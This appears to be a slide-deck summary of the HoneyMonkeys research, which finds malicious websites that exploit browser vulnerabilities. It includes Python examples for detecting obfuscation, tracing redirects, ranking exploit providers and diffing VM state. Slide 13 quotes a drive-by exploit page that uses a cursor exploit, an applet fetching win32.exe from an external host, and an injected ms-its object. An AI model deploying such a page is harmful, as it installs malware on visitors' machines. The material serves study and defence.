Automated Web Patrol with Strider HoneyMonkeys: Finding Web Sites That Exploit Browser Vulnerabilities
Slide 1: Automated Web Patrol with Strider HoneyMonkeys: Finding Web Sites That Exploit Browser Vulnerabilities
AUTHORS: Yi-Min Wang, Doug Beck, Xuxian Jiang, Roussi Roussev, Chad Verbowski, Shuo Chen, and Sam King
PUBLISHED IN: MICROSOFT RESEARCH, Redmond
Slide 2: PROPOSED PROBLEM
• Emerging attack: Internet attacks by malicious websites
• Exploit browser vulnerabilities
• Install malicious contents
• Use of HoneyMonkeys as the solution
Slide 3: BROWSER BASED VULNERABILITY
• Code obfuscation
• URL redirection
• Vulnerability exploitation
• Malware installation
Slide 4: CODE OBFUSCATION
Slide 5: CODE OBFUSCATION
• To escape from signature-based scanning
• Custom decoding routine included inside the script
• Unreadable long strings that are encoded and decoded later by the script or by the browser
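The three indicators on this slide (long encoded literals, an in-script decoding routine, and a decode-then-run sink) can be checked statically. This is an added example, not code from the paper; the two scripts and the thresholds are constructed for the demo.

```python
import re

# Constructed scripts for the demo (not the paper's samples): a loader that hides an
# <iframe> behind a %-encoded string plus a custom decoder, and a plain script.
OBFUSCATED = (
    "var s='%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%65%78%61%6D%70%6C%65%2E"
    "%74%65%73%74%2F%22%3E%3C%2F%69%66%72%61%6D%65%3E';"
    "function d(x){var o='';for(var i=0;i<x.length;i++){o+=x.charAt(i);}return unescape(o);}"
    "document.write(d(s));"
)
PLAIN = "function show(){var el=document.getElementById('msg');el.innerText='Hello';}show();"

# Calls an inline decoder typically needs, plus the sinks that run the decoded text.
DECODER_CALLS = ("unescape", "String.fromCharCode", "charCodeAt", "eval", "execScript", "document.write")
STRING_RE = re.compile(r"'([^'\\]*(?:\\.[^'\\]*)*)'|\"([^\"\\]*(?:\\.[^\"\\]*)*)\"")
ENCODED_RE = re.compile(r"(?:%[0-9A-Fa-f]{2}|\\x[0-9A-Fa-f]{2}|\\u[0-9A-Fa-f]{4}|[A-Za-z0-9+/=])+")
DECODER_FN_RE = re.compile(r"function\s+\w*\s*\([^)]*\)\s*\{[^}]*(?:charAt|charCodeAt|fromCharCode|unescape|substr)")

def obfuscation_indicators(script, long_string=60):
    """Score one script against the slide's indicators: long encoded string literals,
    a custom decoding function, and a sink that executes or writes the decoded text."""
    literals = [a or b for a, b in STRING_RE.findall(script)]
    encoded = [s for s in literals if len(s) >= long_string and ENCODED_RE.fullmatch(s)]
    calls = [c for c in DECODER_CALLS if c in script]
    custom_decoder = DECODER_FN_RE.search(script) is not None
    sink = any(c in calls for c in ("eval", "execScript", "document.write"))
    decodes = custom_decoder or "unescape" in calls or "String.fromCharCode" in calls
    return {
        "longest_literal": max((len(s) for s in literals), default=0),
        "encoded_literals": len(encoded),
        "decoder_calls": calls,
        "custom_decoder": custom_decoder,
        "suspicious": bool(encoded) and decodes and sink,
    }
```

The heuristic flags only the combination of all three indicators, which keeps ordinary scripts with one long string or one `document.write` from being reported.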
Slide 6: ENCODED MALICIOUS CODE
Slide 7: DECODED MALICIOUS CODE
Slide 8: URL REDIRECTION
Slide 9: URL REDIRECTION
• Primary URL to secondary URL
• Protocol redirection using HTTP 302 Temporary Redirect
• HTML tags
• Script functions including window.location.replace()
Slide 10: URL REDIRECTION
Diagram: the USER requests the PRIMARY URL http://[IP address]/[8 chars]/test2/iejp.htm, which redirects to the SECONDARY URL http://[IP address]
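Slides 9 and 10 list three redirection mechanisms and a primary-to-secondary chain; the tracer below recognises all three and follows them recursively, the way the system's redirection analysis does. This is an added example, not the paper's code; the responses in PAGES are constructed, and the regular expressions are a deliberately small subset of what real pages use.

```python
import re
from urllib.parse import urljoin

# Constructed responses standing in for fetched pages (not the paper's data):
# url -> (HTTP status, headers, body). Each hop uses a different redirection mechanism.
PAGES = {
    "http://primary.example/iejp.htm": (302, {"Location": "/hop.htm"}, ""),
    "http://primary.example/hop.htm": (200, {},
        '<meta http-equiv="refresh" content="0; url=http://second.example/a.htm">'),
    "http://second.example/a.htm": (200, {},
        '<script>window.location.replace("http://exploit.example/e.htm")</script>'),
    "http://exploit.example/e.htm": (200, {},
        "<iframe src='http://exploit.example/e.htm' width=1 height=1></iframe>"),  # loops to itself
}

META_RE = re.compile(r'<meta[^>]*http-equiv\s*=\s*["\']?refresh["\']?[^>]*content\s*=\s*["\']?\s*\d+\s*;\s*url\s*=\s*([^"\'>\s]+)', re.I)
FRAME_RE = re.compile(r'<i?frame[^>]*\bsrc\s*=\s*["\']?([^"\'>\s]+)', re.I)
SCRIPT_RE = re.compile(r'(?:window\.)?location(?:\.href)?\s*(?:=|\.replace\s*\()\s*["\']([^"\']+)["\']')

def find_redirects(url, status, headers, body):
    """Return (mechanism, absolute target) pairs for every redirection found in one response."""
    found = []
    if status in (301, 302, 303, 307) and "Location" in headers:        # protocol-level redirect
        found.append(("http-%d" % status, urljoin(url, headers["Location"])))
    for rx, name in ((META_RE, "meta-refresh"), (FRAME_RE, "frame-tag"), (SCRIPT_RE, "script")):
        found.extend((name, urljoin(url, m.group(1))) for m in rx.finditer(body))
    return found

def redirect_chain(start, pages=PAGES, max_depth=10):
    """Recursive redirection analysis: follow every redirection from `start`, recording
    (source, mechanism, target) edges. A URL already visited is not expanded again,
    so self-referencing frames and redirect loops terminate."""
    edges, seen = [], set()
    def walk(url, depth):
        if url in seen or depth > max_depth or url not in pages:
            return
        seen.add(url)
        status, headers, body = pages[url]
        for mech, target in find_redirects(url, status, headers, body):
            edges.append((url, mech, target))
            walk(target, depth + 1)
    walk(start, 0)
    return edges
```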
Slide 11: VULNERABILITY EXPLOITATION
Slide 12: VULNERABILITY EXPLOITATION
• Malicious websites attempt to exploit multiple vulnerabilities
• HTML fragments: multiple files from different URLs
• Dynamic code injection using document.write
• Trojan downloader runs after the exploits
• Most attacked browser is IE
Slide 13: EXAMPLE FOR VULNERABILITY

```html
<html><head><title></title></head><body>
<style>* {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")}</style>
<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1>
  <PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'>
</APPLET>
<script>
try{document.write('<object data=`ms-its:mhtml:file://C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+'m::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>');}catch(e){}
</script>
</body></html>
```

The slide labels the three parts of this page Exploit 1, Exploit 2 and Exploit 3: the CURSOR style pointing at an .anr file, the APPLET, and the ms-its object assembled from string fragments and injected with document.write.
Slide 14: Honey Monkey Exploit Detection System
• Active client-side honeypots: virtual machines that visit web sites
• Large-scale, systematic and automated web patrol
• It mimics human browsing
• Different patch levels and different levels of vulnerability
Slide 15: HONEYMONKEY SYSTEM
• Stage 1 – scalable mode: visit N URLs
• Stage 2 – perform recursive redirection analysis
• Stage 3 – scan exploit URLs using fully patched VMs
Slide 16: HONEY MONKEY SYSTEM
Slide 17: TOPOLOGY GRAPH AND NODE RANKING
• Rectangular nodes represent exploit URLs
• Arrows represent traffic redirection
• Circles represent nodes that act as an aggregation point for the exploit pages hosted there
• R is the most likely exploit provider
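Ranking nodes in the redirection topology, as an added example rather than the paper's code: every node is scored by how many URLs funnel into it, directly and through chains, and nodes with several direct redirectors are reported as aggregation points. The edge list is constructed for the demo.

```python
from collections import defaultdict, deque

# Constructed site-to-site redirection edges (not the paper's data). Three front-end sites
# funnel through one hop into a provider that also receives traffic directly.
EDGES = [
    ("http://a.example/1.htm", "http://hop.example/r.php"),
    ("http://b.example/2.htm", "http://hop.example/r.php"),
    ("http://c.example/3.htm", "http://hop.example/r.php"),
    ("http://hop.example/r.php", "http://prov.example/exp.htm"),
    ("http://d.example/4.htm", "http://prov.example/exp.htm"),
    ("http://e.example/5.htm", "http://other.example/x.htm"),
]

def build_graph(edges):
    """Adjacency in both directions: succ[u] = targets of u, pred[v] = URLs redirecting to v."""
    succ, pred = defaultdict(set), defaultdict(set)
    for src, dst in edges:
        succ[src].add(dst)
        pred[dst].add(src)
    return set(succ) | set(pred), succ, pred

def upstream_count(node, pred):
    """Number of distinct URLs that reach `node` through any chain of redirections (BFS on pred)."""
    seen, queue = set(), deque([node])
    while queue:
        for p in pred.get(queue.popleft(), ()):
            if p not in seen:
                seen.add(p)
                queue.append(p)
    return len(seen)

def rank_providers(edges):
    """Rank every node by (transitive upstream count, direct in-degree). The first entry is
    where the most traffic ends up, i.e. the most likely exploit provider (the slide's R)."""
    nodes, _, pred = build_graph(edges)
    scored = [(upstream_count(n, pred), len(pred.get(n, ())), n) for n in nodes]
    return sorted(scored, key=lambda t: (-t[0], -t[1], t[2]))

def aggregation_points(edges, min_in=2):
    """Nodes that several URLs redirect into directly: the circles in the topology graph."""
    _, _, pred = build_graph(edges)
    return sorted(n for n, srcs in pred.items() if len(srcs) >= min_in)
```

Counting transitive upstream URLs rather than only direct in-degree is what lets the provider outrank the hop that merely relays traffic to it.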
Slide 18: TOPOLOGY GRAPH AND NODE RANKING
Slide 19: GENERATING URL LISTS
• Suspicious URLs
• Popular websites – if attacked, they potentially reach a larger population
• Localized-space websites
Slide 20: Exploit Detection Report
• Executable files created or modified outside the browser sandbox folders
• Processes created
• Windows registry entries created or modified
• Vulnerability exploited
• Redirect URL visited
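The first three report fields come from diffing VM state before and after a visit; the example below, added here and not taken from the paper, does that diff over constructed snapshots. The sandbox folder list, file hashes, process names and registry values are all assumptions for the demo; the "vulnerability exploited" and "redirect URL visited" fields come from the other stages and are not modelled.

```python
# Constructed snapshots of one HoneyMonkey VM (not the paper's data): state captured before
# and after the monkey visits a URL. "files" maps path -> content hash, "procs" is the
# running process set, "registry" maps value name -> data.
TIF = r"C:\Documents and Settings\monkey\Local Settings\Temporary Internet Files"
SANDBOX_DIRS = (TIF, r"C:\Documents and Settings\monkey\Cookies")  # folders the browser may write
EXEC_EXT = (".exe", ".dll", ".scr", ".com", ".bat", ".cmd")
RUN_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

BEFORE = {
    "files": {r"C:\WINDOWS\system32\kernel32.dll": "h-a", TIF + r"\ad[1].gif": "h-b"},
    "procs": {"explorer.exe", "iexplore.exe"},
    "registry": {RUN_KEY + r"\ctfmon": "ctfmon.exe"},
}
AFTER_EXPLOITED = {
    "files": {**BEFORE["files"],
              TIF + r"\win32[1].exe": "h-c",                # fetched into the cache: not a finding
              r"C:\WINDOWS\system32\msupd.exe": "h-d"},    # dropped outside the sandbox: finding
    "procs": BEFORE["procs"] | {"msupd.exe"},
    "registry": {**BEFORE["registry"], RUN_KEY + r"\msupd": r"C:\WINDOWS\system32\msupd.exe"},
}
AFTER_CLEAN = {**BEFORE, "files": {**BEFORE["files"], TIF + r"\logo[1].png": "h-e"}}

def in_sandbox(path):
    """True when the path lies under one of the browser's own writable folders."""
    return any(path.lower().startswith(d.lower() + "\\") for d in SANDBOX_DIRS)

def exploit_report(url, before, after):
    """Black-box verdict: any persistent change outside the browser's own folders after a
    visit with no user interaction counts as an exploit, whatever the vulnerability was."""
    changed = [p for p, h in after["files"].items() if before["files"].get(p) != h]
    executables = sorted(p for p in changed if p.lower().endswith(EXEC_EXT) and not in_sandbox(p))
    processes = sorted(after["procs"] - before["procs"])
    registry = sorted(k for k, v in after["registry"].items() if before["registry"].get(k) != v)
    return {"url": url, "executables": executables, "processes": processes,
            "registry": registry, "exploit": bool(executables or processes or registry)}
```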
Slide 21: Patch level statistics
Slide 22: RESULTS
Slide 24: ADVANTAGES
• Automatic
• Scalable
• Non-signature-based approach
• Stage-wise detection
Slide 25: DISADVANTAGES
• Exploiters may randomize the attack, confusing the honey monkeys
• Exploiters were able to detect honey monkeys by sending a dialog box
• They didn't explain the topology graphs very clearly
Slide 26: IMPROVEMENTS
• They need to work on accuracy
• They need more classification according to content
• They should improve at keeping the honey monkeys from being detected